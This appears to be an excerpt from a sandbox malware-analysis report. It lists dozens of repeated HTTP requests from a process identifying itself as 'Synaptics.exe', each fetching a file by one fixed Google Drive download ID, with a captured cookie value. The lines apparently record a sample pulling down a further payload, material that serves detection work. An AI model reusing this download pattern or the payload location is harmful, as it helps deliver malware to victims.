                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
